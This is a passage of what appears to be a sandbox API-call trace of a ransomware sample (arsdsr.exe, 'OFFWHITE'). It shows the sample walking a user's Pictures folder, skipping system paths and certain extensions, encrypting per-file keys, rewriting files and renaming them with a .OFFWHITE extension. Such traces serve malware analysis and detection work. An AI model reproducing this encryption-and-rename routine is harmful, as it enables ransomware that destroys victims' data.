HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\wu4JnlA\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\wu4JnlA\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\wu4JnlA\\" [0135.558] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\wu4JnlA\\", lpString2="*.*" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\wu4JnlA\\*.*") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\wu4JnlA\\*.*" [0135.558] FindFirstFileW (in: lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\wu4JnlA\\*.*", lpFindFileData=0x295cb98 | out: lpFindFileData=0x295cb98*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3a57160, ftCreationTime.dwHighDateTime=0x1d5d9c0, ftLastAccessTime.dwLowDateTime=0xe6619e80, ftLastAccessTime.dwHighDateTime=0x1d5db0e, ftLastWriteTime.dwLowDateTime=0xe6619e80, ftLastWriteTime.dwHighDateTime=0x1d5db0e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x295cb3c, dwReserved1=0x42d727a7, cFileName=".", cAlternateFileName="")) returned 0x544790 [0135.560] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0135.560] FindNextFileW (in: hFindFile=0x544790, lpFindFileData=0x295cb98 | out: lpFindFileData=0x295cb98*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3a57160, ftCreationTime.dwHighDateTime=0x1d5d9c0, ftLastAccessTime.dwLowDateTime=0xe6619e80, ftLastAccessTime.dwHighDateTime=0x1d5db0e, ftLastWriteTime.dwLowDateTime=0xe6619e80, ftLastWriteTime.dwHighDateTime=0x1d5db0e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x295cb3c, dwReserved1=0x42d727a7, cFileName="..", cAlternateFileName="")) returned 1 [0135.560] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0135.560] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0135.560] FindNextFileW (in: hFindFile=0x544790, lpFindFileData=0x295cb98 | out: lpFindFileData=0x295cb98*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x29953870, ftCreationTime.dwHighDateTime=0x1d5da7d, ftLastAccessTime.dwLowDateTime=0x7d198a00, ftLastAccessTime.dwHighDateTime=0x1d5e1df, ftLastWriteTime.dwLowDateTime=0x7d198a00, ftLastWriteTime.dwHighDateTime=0x1d5e1df, nFileSizeHigh=0x0, nFileSizeLow=0x4e5b, dwReserved0=0x295cb3c, dwReserved1=0x42d727a7, cFileName="5b63GS_FXYxiq0kdWzh.png", cAlternateFileName="5B63GS~1.PNG")) returned 1 [0135.560] lstrcmpiW (lpString1="5b63GS_FXYxiq0kdWzh.png", lpString2=".") returned 1 [0135.560] lstrcmpiW (lpString1="5b63GS_FXYxiq0kdWzh.png", lpString2="..") returned 1 [0135.560] lstrcmpiW (lpString1="5b63GS_FXYxiq0kdWzh.png", lpString2="...") returned 1 [0135.560] lstrcmpiW (lpString1="5b63GS_FXYxiq0kdWzh.png", lpString2="windows") returned -1 [0135.560] lstrcmpiW (lpString1="5b63GS_FXYxiq0kdWzh.png", lpString2="$recycle.bin") returned 1 [0135.560] lstrcmpiW (lpString1="5b63GS_FXYxiq0kdWzh.png", lpString2="rsa") returned -1 [0135.560] lstrcmpiW (lpString1="5b63GS_FXYxiq0kdWzh.png", lpString2="ntuser.dat") returned -1 [0135.560] lstrcmpiW (lpString1="5b63GS_FXYxiq0kdWzh.png", lpString2="programdata") returned -1 [0135.560] lstrcmpiW (lpString1="5b63GS_FXYxiq0kdWzh.png", lpString2="appdata") returned -1 [0135.560] lstrcmpiW (lpString1="5b63GS_FXYxiq0kdWzh.png", lpString2="program files") returned -1 [0135.560] lstrcmpiW (lpString1="5b63GS_FXYxiq0kdWzh.png", lpString2="program files (x86)") returned -1 [0135.561] lstrcpyW (in: lpString1=0x295cde8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\wu4JnlA\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\wu4JnlA\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\wu4JnlA\\" [0135.561] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\wu4JnlA\\", lpString2="5b63GS_FXYxiq0kdWzh.png" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\wu4JnlA\\5b63GS_FXYxiq0kdWzh.png") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\wu4JnlA\\5b63GS_FXYxiq0kdWzh.png" [0135.561] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.561] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.561] PathFindExtensionW (pszPath="5b63GS_FXYxiq0kdWzh.png") returned=".png" [0135.561] lstrcmpiW (lpString1=".png", lpString2=".exe") returned 1 [0135.561] lstrcmpiW (lpString1=".png", lpString2=".log") returned 1 [0135.561] lstrcmpiW (lpString1=".png", lpString2=".cab") returned 1 [0135.561] lstrcmpiW (lpString1=".png", lpString2=".cmd") returned 1 [0135.561] lstrcmpiW (lpString1=".png", lpString2=".com") returned 1 [0135.561] lstrcmpiW (lpString1=".png", lpString2=".cpl") returned 1 [0135.561] lstrcmpiW (lpString1=".png", lpString2=".ini") returned 1 [0135.561] lstrcmpiW (lpString1=".png", lpString2=".dll") returned 1 [0135.561] lstrcmpiW (lpString1=".png", lpString2=".url") returned -1 [0135.561] lstrcmpiW (lpString1=".png", lpString2=".ttf") returned -1 [0135.561] lstrcmpiW (lpString1=".png", lpString2=".mp3") returned 1 [0135.561] lstrcmpiW (lpString1=".png", lpString2=".pif") returned 1 [0135.561] lstrcmpiW (lpString1=".png", lpString2=".mp4") returned 1 [0135.561] lstrcmpiW (lpString1=".png", lpString2=".OFFWHITE") returned 1 [0135.561] lstrcmpiW (lpString1=".png", lpString2=".msi") returned 1 [0135.561] lstrcmpiW (lpString1="5b63GS_FXYxiq0kdWzh.png", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0135.561] GetProcessHeap () returned 0x500000 [0135.561] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x531ad0 [0135.561] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\wu4JnlA\\5b63GS_FXYxiq0kdWzh.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gneccgvdlty7h2sg3p04\\1pomgc9c\\rmts7wxti\\wu4jnla\\5b63gs_fxyxiq0kdwzh.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e4 [0135.561] GetFileSizeEx (in: hFile=0x1e4, lpFileSize=0x295cb60 | out: lpFileSize=0x295cb60*=20059) returned 1 [0135.562] GetProcessHeap () returned 0x500000 [0135.562] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5314d0 [0135.562] GetProcessHeap () returned 0x500000 [0135.562] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5314e8 [0135.562] GetProcessHeap () returned 0x500000 [0135.562] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x524d00 [0135.562] GetProcessHeap () returned 0x500000 [0135.562] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x524e08 [0135.562] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.562] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.562] SystemFunction036 (in: RandomBuffer=0x5314d0, RandomBufferLength=0x10 | out: RandomBuffer=0x5314d0) returned 1 [0135.562] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.562] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.562] SystemFunction036 (in: RandomBuffer=0x5314e8, RandomBufferLength=0x10 | out: RandomBuffer=0x5314e8) returned 1 [0135.562] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.562] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.562] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x524d00*, pdwDataLen=0x295c910*=0x10, dwBufLen=0x100 | out: pbData=0x524d00*, pdwDataLen=0x295c910*=0x100) returned 1 [0135.562] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.562] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.562] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x524e08*, pdwDataLen=0x295c90c*=0x10, dwBufLen=0x100 | out: pbData=0x524e08*, pdwDataLen=0x295c90c*=0x100) returned 1 [0135.562] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x4e5b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.562] SetLastError (dwErrCode=0x0) [0135.563] WriteFile (in: hFile=0x1e4, lpBuffer=0x524d00*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295cb4c, lpOverlapped=0x0 | out: lpBuffer=0x524d00*, lpNumberOfBytesWritten=0x295cb4c*=0x100, lpOverlapped=0x0) returned 1 [0135.564] GetLastError () returned 0x0 [0135.564] GetLastError () returned 0x0 [0135.564] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x4f5b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.564] WriteFile (in: hFile=0x1e4, lpBuffer=0x524e08*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295cb4c, lpOverlapped=0x0 | out: lpBuffer=0x524e08*, lpNumberOfBytesWritten=0x295cb4c*=0x100, lpOverlapped=0x0) returned 1 [0135.564] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x505b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.564] WriteFile (in: hFile=0x1e4, lpBuffer=0x531ad0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295cb4c, lpOverlapped=0x0 | out: lpBuffer=0x531ad0*, lpNumberOfBytesWritten=0x295cb4c*=0x8, lpOverlapped=0x0) returned 1 [0135.564] GetProcessHeap () returned 0x500000 [0135.564] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x4e5b) returned 0x55d7d0 [0135.564] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.565] ReadFile (in: hFile=0x1e4, lpBuffer=0x55d7d0, nNumberOfBytesToRead=0x4e5b, lpNumberOfBytesRead=0x295cb40, lpOverlapped=0x0 | out: lpBuffer=0x55d7d0*, lpNumberOfBytesRead=0x295cb40*=0x4e5b, lpOverlapped=0x0) returned 1 [0135.566] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.566] WriteFile (in: hFile=0x1e4, lpBuffer=0x55d7d0*, nNumberOfBytesToWrite=0x4e5b, lpNumberOfBytesWritten=0x295cb4c, lpOverlapped=0x0 | out: lpBuffer=0x55d7d0*, lpNumberOfBytesWritten=0x295cb4c*=0x4e5b, lpOverlapped=0x0) returned 1 [0135.566] GetProcessHeap () returned 0x500000 [0135.566] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55d7d0 | out: hHeap=0x500000) returned 1 [0135.566] CloseHandle (hObject=0x1e4) returned 1 [0135.569] GetProcessHeap () returned 0x500000 [0135.569] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x524d00 | out: hHeap=0x500000) returned 1 [0135.569] GetProcessHeap () returned 0x500000 [0135.569] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x524e08 | out: hHeap=0x500000) returned 1 [0135.569] GetProcessHeap () returned 0x500000 [0135.569] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5314d0 | out: hHeap=0x500000) returned 1 [0135.569] GetProcessHeap () returned 0x500000 [0135.569] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5314e8 | out: hHeap=0x500000) returned 1 [0135.569] lstrcpyW (in: lpString1=0x295c938, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\wu4JnlA\\5b63GS_FXYxiq0kdWzh.png" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\wu4JnlA\\5b63GS_FXYxiq0kdWzh.png") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\wu4JnlA\\5b63GS_FXYxiq0kdWzh.png" [0135.569] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\wu4JnlA\\5b63GS_FXYxiq0kdWzh.png", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\wu4JnlA\\5b63GS_FXYxiq0kdWzh.png.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\wu4JnlA\\5b63GS_FXYxiq0kdWzh.png.OFFWHITE" [0135.569] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\wu4JnlA\\5b63GS_FXYxiq0kdWzh.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gneccgvdlty7h2sg3p04\\1pomgc9c\\rmts7wxti\\wu4jnla\\5b63gs_fxyxiq0kdwzh.png"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\wu4JnlA\\5b63GS_FXYxiq0kdWzh.png.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gneccgvdlty7h2sg3p04\\1pomgc9c\\rmts7wxti\\wu4jnla\\5b63gs_fxyxiq0kdwzh.png.offwhite")) returned 1 [0135.570] FindNextFileW (in: hFindFile=0x544790, lpFindFileData=0x295cb98 | out: lpFindFileData=0x295cb98*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5252de80, ftCreationTime.dwHighDateTime=0x1d5e65c, ftLastAccessTime.dwLowDateTime=0x5ba35370, ftLastAccessTime.dwHighDateTime=0x1d5e3af, ftLastWriteTime.dwLowDateTime=0x5ba35370, ftLastWriteTime.dwHighDateTime=0x1d5e3af, nFileSizeHigh=0x0, nFileSizeLow=0x6d7e, dwReserved0=0x295cb3c, dwReserved1=0x42d727a7, cFileName="HtoccuJZ.gif", cAlternateFileName="")) returned 1 [0135.570] lstrcmpiW (lpString1="HtoccuJZ.gif", lpString2=".") returned 1 [0135.570] lstrcmpiW (lpString1="HtoccuJZ.gif", lpString2="..") returned 1 [0135.570] lstrcmpiW (lpString1="HtoccuJZ.gif", lpString2="...") returned 1 [0135.570] lstrcmpiW (lpString1="HtoccuJZ.gif", lpString2="windows") returned -1 [0135.570] lstrcmpiW (lpString1="HtoccuJZ.gif", lpString2="$recycle.bin") returned 1 [0135.570] lstrcmpiW (lpString1="HtoccuJZ.gif", lpString2="rsa") returned -1 [0135.570] lstrcmpiW (lpString1="HtoccuJZ.gif", lpString2="ntuser.dat") returned -1 [0135.570] lstrcmpiW (lpString1="HtoccuJZ.gif", lpString2="programdata") returned -1 [0135.570] lstrcmpiW (lpString1="HtoccuJZ.gif", lpString2="appdata") returned 1 [0135.570] lstrcmpiW (lpString1="HtoccuJZ.gif", lpString2="program files") returned -1 [0135.570] lstrcmpiW (lpString1="HtoccuJZ.gif", lpString2="program files (x86)") returned -1 [0135.570] lstrcpyW (in: lpString1=0x295cde8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\wu4JnlA\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\wu4JnlA\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\wu4JnlA\\" [0135.570] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\wu4JnlA\\", lpString2="HtoccuJZ.gif" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\wu4JnlA\\HtoccuJZ.gif") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\wu4JnlA\\HtoccuJZ.gif" [0135.570] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.570] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.570] PathFindExtensionW (pszPath="HtoccuJZ.gif") returned=".gif" [0135.570] lstrcmpiW (lpString1=".gif", lpString2=".exe") returned 1 [0135.570] lstrcmpiW (lpString1=".gif", lpString2=".log") returned -1 [0135.570] lstrcmpiW (lpString1=".gif", lpString2=".cab") returned 1 [0135.570] lstrcmpiW (lpString1=".gif", lpString2=".cmd") returned 1 [0135.570] lstrcmpiW (lpString1=".gif", lpString2=".com") returned 1 [0135.570] lstrcmpiW (lpString1=".gif", lpString2=".cpl") returned 1 [0135.570] lstrcmpiW (lpString1=".gif", lpString2=".ini") returned -1 [0135.571] lstrcmpiW (lpString1=".gif", lpString2=".dll") returned 1 [0135.571] lstrcmpiW (lpString1=".gif", lpString2=".url") returned -1 [0135.571] lstrcmpiW (lpString1=".gif", lpString2=".ttf") returned -1 [0135.571] lstrcmpiW (lpString1=".gif", lpString2=".mp3") returned -1 [0135.571] lstrcmpiW (lpString1=".gif", lpString2=".pif") returned -1 [0135.571] lstrcmpiW (lpString1=".gif", lpString2=".mp4") returned -1 [0135.571] lstrcmpiW (lpString1=".gif", lpString2=".OFFWHITE") returned -1 [0135.571] lstrcmpiW (lpString1=".gif", lpString2=".msi") returned -1 [0135.571] lstrcmpiW (lpString1="HtoccuJZ.gif", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0135.571] GetProcessHeap () returned 0x500000 [0135.571] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x531ae0 [0135.571] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\wu4JnlA\\HtoccuJZ.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gneccgvdlty7h2sg3p04\\1pomgc9c\\rmts7wxti\\wu4jnla\\htoccujz.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e4 [0135.571] GetFileSizeEx (in: hFile=0x1e4, lpFileSize=0x295cb60 | out: lpFileSize=0x295cb60*=28030) returned 1 [0135.571] GetProcessHeap () returned 0x500000 [0135.571] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5314e8 [0135.571] GetProcessHeap () returned 0x500000 [0135.571] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5314d0 [0135.571] GetProcessHeap () returned 0x500000 [0135.571] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x524e08 [0135.572] GetProcessHeap () returned 0x500000 [0135.572] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x524d00 [0135.572] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.572] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.572] SystemFunction036 (in: RandomBuffer=0x5314e8, RandomBufferLength=0x10 | out: RandomBuffer=0x5314e8) returned 1 [0135.572] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.572] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.572] SystemFunction036 (in: RandomBuffer=0x5314d0, RandomBufferLength=0x10 | out: RandomBuffer=0x5314d0) returned 1 [0135.572] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.572] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.572] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x524e08*, pdwDataLen=0x295c910*=0x10, dwBufLen=0x100 | out: pbData=0x524e08*, pdwDataLen=0x295c910*=0x100) returned 1 [0135.572] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0135.572] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0135.572] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x524d00*, pdwDataLen=0x295c90c*=0x10, dwBufLen=0x100 | out: pbData=0x524d00*, pdwDataLen=0x295c90c*=0x100) returned 1 [0135.572] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x6d7e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.572] SetLastError (dwErrCode=0x0) [0135.572] WriteFile (in: hFile=0x1e4, lpBuffer=0x524e08*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295cb4c, lpOverlapped=0x0 | out: lpBuffer=0x524e08*, lpNumberOfBytesWritten=0x295cb4c*=0x100, lpOverlapped=0x0) returned 1 [0135.574] GetLastError () returned 0x0 [0135.574] GetLastError () returned 0x0 [0135.574] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x6e7e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.574] WriteFile (in: hFile=0x1e4, lpBuffer=0x524d00*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295cb4c, lpOverlapped=0x0 | out: lpBuffer=0x524d00*, lpNumberOfBytesWritten=0x295cb4c*=0x100, lpOverlapped=0x0) returned 1 [0135.574] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x6f7e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.574] WriteFile (in: hFile=0x1e4, lpBuffer=0x531ae0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295cb4c, lpOverlapped=0x0 | out: lpBuffer=0x531ae0*, lpNumberOfBytesWritten=0x295cb4c*=0x8, lpOverlapped=0x0) returned 1 [0135.574] GetProcessHeap () returned 0x500000 [0135.574] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x6d7e) returned 0x55d7d0 [0135.574] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.574] ReadFile (in: hFile=0x1e4, lpBuffer=0x55d7d0, nNumberOfBytesToRead=0x6d7e, lpNumberOfBytesRead=0x295cb40, lpOverlapped=0x0 | out: lpBuffer=0x55d7d0*, lpNumberOfBytesRead=0x295cb40*=0x6d7e, lpOverlapped=0x0) returned 1 [0135.576] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.576] WriteFile (in: hFile=0x1e4, lpBuffer=0x55d7d0*, nNumberOfBytesToWrite=0x6d7e, lpNumberOfBytesWritten=0x295cb4c, lpOverlapped=0x0 | out: lpBuffer=0x55d7d0*, lpNumberOfBytesWritten=0x295cb4c*=0x6d7e, lpOverlapped=0x0) returned 1 [0135.576] GetProcessHeap () returned 0x500000 [0135.576] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55d7d0 | out: hHeap=0x500000) returned 1 [0135.577] CloseHandle (hObject=0x1e4) returned 1 [0135.578] GetProcessHeap () returned 0x500000 [0135.578] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x524e08 | out: hHeap=0x500000) returned 1 [0135.578] GetProcessHeap () returned 0x500000 [0135.578] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x524d00 | out: hHeap=0x500000) returned 1 [0135.578] GetProcessHeap () returned 0x500000 [0135.578] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5314e8 | out: hHeap=0x500000) returned 1 [0135.578] GetProcessHeap () returned 0x500000 [0135.578] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5314d0 | out: hHeap=0x500000) returned 1 [0135.578] lstrcpyW (in: lpString1=0x295c938, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\wu4JnlA\\HtoccuJZ.gif" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\wu4JnlA\\HtoccuJZ.gif") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\wu4JnlA\\HtoccuJZ.gif" [0135.578] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\wu4JnlA\\HtoccuJZ.gif", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\wu4JnlA\\HtoccuJZ.gif.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\wu4JnlA\\HtoccuJZ.gif.OFFWHITE" [0135.578] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\wu4JnlA\\HtoccuJZ.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gneccgvdlty7h2sg3p04\\1pomgc9c\\rmts7wxti\\wu4jnla\\htoccujz.gif"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\gNEccgvDLtY7H2sg3p04\\1POmGc9c\\rMts7wxti\\wu4JnlA\\HtoccuJZ.gif.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gneccgvdlty7h2sg3p04\\1pomgc9c\\rmts7wxti\\wu4jnla\\htoccujz.gif.offwhite")) returned 1 [0135.579] FindNextFileW (in: hFindFile=0x544790, lpFindFileData=0x295cb98 | out: lpFindFileData=0x295cb98*(dwFileAttributes=0x20, 